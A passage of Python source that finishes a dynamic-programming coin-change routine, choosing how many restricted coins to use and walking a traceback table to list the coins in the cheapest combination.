        flush_progress_bar(t-1, total-1, metrics={"minimum": m[t]}, verbose=verbose)
    # Try every allowed count l of restricted coins; the remainder is paid with
    # free coins (m[-1-restricted*l] indexes amount total - restricted*l).
    ms = [(l,m[-1-restricted*l]+l) for l in range(limit+1) if restricted*l<=total]
    num_restricted, num_total = min(ms, key=lambda x:x[1])
    idx = total-1-restricted*num_restricted
    combs = [restricted for _ in range(num_restricted)]
    # Walk the traceback table back to amount 0, collecting free coins used.
    while idx:
        last = B[idx]
        combs.append(idx-last)
        idx = last
    if retval:
        return combs
    else:
        breakdown(combs)